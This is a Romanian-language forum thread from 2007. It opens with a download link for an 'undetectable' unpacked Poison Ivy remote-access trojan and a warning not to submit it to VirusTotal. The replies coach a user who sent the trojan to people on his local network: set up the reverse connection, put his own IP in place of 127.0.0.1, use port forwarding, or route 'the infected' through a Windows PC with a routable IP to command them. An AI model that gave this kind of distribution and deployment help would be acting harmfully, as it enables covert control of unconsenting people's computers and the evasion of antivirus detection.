Ras Posted June 26, 2007 Report Posted June 26, 2007 Momentan nedetectabil, testat de mine. Sa nu ii faceti upload pe VirusTotal sau cum e pagina aia...Download: http://rapidshare.com/files/39476676/Poison_Ivy_2.3.0__unpacked_.rar Quote
Guest Nemessis Posted June 26, 2007 Report Posted June 26, 2007 Bravo. De unde dracu l-ai produs? Forumul Chasenet? Quote
kabout3r Posted June 27, 2007 Report Posted June 27, 2007 Reversing Labs un site plin cu unpackerz :twisted: Quote
kaka Posted June 27, 2007 Report Posted June 27, 2007 l am dat pe la astia prin retzea ...dar nici o treaba ... poti sa ma lamuresti cumva? Quote
Ras Posted June 27, 2007 Author Report Posted June 27, 2007 Pai cu ce sa te lamuresc?Presupun ca ai creat un server apoi l-ai trimis celor de la tine din retea si dupaia te conectezi pe server si le faci ce vrei. Quote
kaka Posted June 27, 2007 Report Posted June 27, 2007 da asa am facut...am testat la mine ...am vazut ca se connecteaza.. apoi am trimis serveru ala la lumea din retzea...dar nu se connecteaza decat la mine...si am incercat cu un prieten care la rulat si degeaba ...nu se connecteaza decat la mine ) ...adik eu la mine te rog sa mi zici daca mai e ceva de facut Quote
the_branch Posted June 27, 2007 Report Posted June 27, 2007 nu m-am uitat pe trojan...dar nu crezi ca ar trebui sa faci rost de ip-ul persoanelor infectate? cam asta trebuie la toti trojanii Quote
Guest Nemessis Posted June 27, 2007 Report Posted June 27, 2007 Setati reverse connection asa cum trebuie. Voi trebuie sa aveti obligatoriu ip routabil altfel conexiunile nu vor ajunge la voi ci se vor opri in server/router. Quote
virusz Posted June 27, 2007 Report Posted June 27, 2007 fain asta...mersidaca ai facut serverul cum trebuie... mai ales la IP: acolo unde e 127.0.0.1 sa scrii ip-ul tau... si nu merge ,atunci e posibil sa nu lase firewall-ul vezi , fa o verificare....bafta! Quote
kaka Posted June 27, 2007 Report Posted June 27, 2007 pai eu nu am IP routabil. eu sunt intr o retea si ma conectez la net prin pppoe. pot sa fac ceva ca sa mi mearga acest program? astept raspuns daca pot sa fac ceva in privinta asta...ca sa mi mearga si mie prg asta .... mersi anticipat;) Quote
Guest Nemessis Posted June 27, 2007 Report Posted June 27, 2007 Daca nu ai ip routabil este foarte greu sa faci ceva pentru a primi ip-urile infectate. Se poate face un port forward catre ip-ul tau daca nu ma insel (chiar va rog sa ma corectati daca gresesc undeva), dar totul se face din serverul/routerul de la care primesti netul. Quote
kaka Posted June 27, 2007 Report Posted June 27, 2007 Daca nu ai ip routabil este foarte greu sa faci ceva pentru a primi ip-urile infectate. Se poate face un port forward catre ip-ul tau daca nu ma insel (chiar va rog sa ma corectati daca gresesc undeva), dar totul se face din serverul/routerul de la care primesti netul.Mersi oricum... daca mai are cineva vreo idee sa mi zica si mie...sa vb cu adminul poate mi da si mie un ip routabil Quote
Guest Nemessis Posted June 27, 2007 Report Posted June 27, 2007 Poti sa folosesti un calculator la care ai acces si care are Windows OS pe el, ip routabil si net desigur. Asa vei redirectiona toti infectatii catre acel pc iar tu ii vei comanda folosind acel pc. Quote
kaka Posted June 27, 2007 Report Posted June 27, 2007 Poti sa folosesti un calculator la care ai acces si care are Windows OS pe el, ip routabil si net desigur. Asa vei redirectiona toti infectatii catre acel pc iar tu ii vei comanda folosind acel pc.deja se complica treaba... mersi mult Quote